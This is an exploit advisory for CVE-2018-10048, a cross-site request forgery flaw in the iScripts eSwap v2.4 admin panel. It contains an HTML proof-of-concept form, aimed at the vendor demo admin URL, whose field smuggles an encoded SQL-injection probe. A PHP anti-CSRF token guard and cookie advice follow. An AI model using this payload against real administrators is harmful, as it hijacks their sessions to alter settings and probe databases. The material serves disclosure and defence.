CVE-2018-10048

ManhNho Apr 11th, 2018 (edited) 255 Never
# Exploit title: iScripts eSwap v2.4 - CSRF via the registration_settings.php Admin Panel
# Date: 11/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/eswap
# Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
# Version: 2.4
# CVE: CVE-2018-10048
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
iScripts eSwap v2.4 has CSRF via the "registration_settings.php" parameters in the Admin Panel: the handler accepts the POST with no anti-CSRF token, so a forged request is processed under the victim's session.

#2. PoC
-----------------------------------------------------
a) Deliver the crafted page below to a logged-in user who has Root Administrator level access

<html>
  <!-- CSRF PoC - ManhNho -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post" method="POST">
      <input type="hidden" name="ddlFree" value="&#45;1&apos;&#32;order&#32;by&#32;0&#32;&#35;" />
      <input type="hidden" name="txtDate" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

b) Once the logged-in user opens the page, the form is submitted with the root administrator's active session and the action is performed.
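The defender-side fix for the issue above is a synchronizer token: the handler behind registration_settings.php?act=post should only act on a POST that carries a per-session secret the cross-site page cannot read. The following is an added example written for this page, not iScripts code; the session layout, the field name csrf_token, the Origin/Referer fallback policy and the expected origin https://www.demo.iscripts.com are assumptions.

```php
<?php
// Added example (not iScripts code): a minimal synchronizer-token CSRF guard
// for a PHP admin endpoint. Assumed: the admin panel already uses PHP
// sessions, and the application's own handler runs only after the guard passes.

declare(strict_types=1);

// Issue (or reuse) a per-session token; embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Returns true only for a POST that (a) carries the session's token and
// (b) originates from this site. A cross-site form like the PoC above is sent
// with the admin's session cookie but cannot read the token, so it fails here.
function csrf_request_is_valid(array $post, array $server, string $expectedOrigin): bool
{
    $sessionToken = $_SESSION['csrf_token'] ?? '';
    $submitted    = $post['csrf_token'] ?? '';
    if ($sessionToken === '' || !is_string($submitted)) {
        return false;
    }
    if (!hash_equals($sessionToken, $submitted)) {   // constant-time compare
        return false;
    }

    // Defence in depth: browsers attach Origin (or at least Referer) to
    // cross-site POSTs. Policy assumed here: no Origin and no Referer => reject.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin === null && isset($server['HTTP_REFERER'])) {
        $parts = parse_url($server['HTTP_REFERER']);
        if ($parts !== false && isset($parts['scheme'], $parts['host'])) {
            $origin = $parts['scheme'] . '://' . $parts['host']
                    . (isset($parts['port']) ? ':' . $parts['port'] : '');
        }
    }
    return $origin !== null && strcasecmp($origin, $expectedOrigin) === 0;
}

// Usage at the top of the settings handler, before anything is written:
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && !csrf_request_is_valid($_POST, $_SERVER, 'https://www.demo.iscripts.com')) {
    http_response_code(403);
    exit('Rejected: missing or invalid CSRF token, or unexpected origin');
}
// ... application logic for registration settings continues here ...
```

The settings form template then has to include the token as a hidden field named csrf_token, with its value passed through htmlspecialchars() when echoed; without that field every legitimate submission is rejected too, which is the correct failure mode. Marking the session cookie SameSite=Lax (or Strict) via session_set_cookie_params() is a second, independent layer that stops the PoC form from carrying the cookie at all on current browsers, but it does not replace the token check.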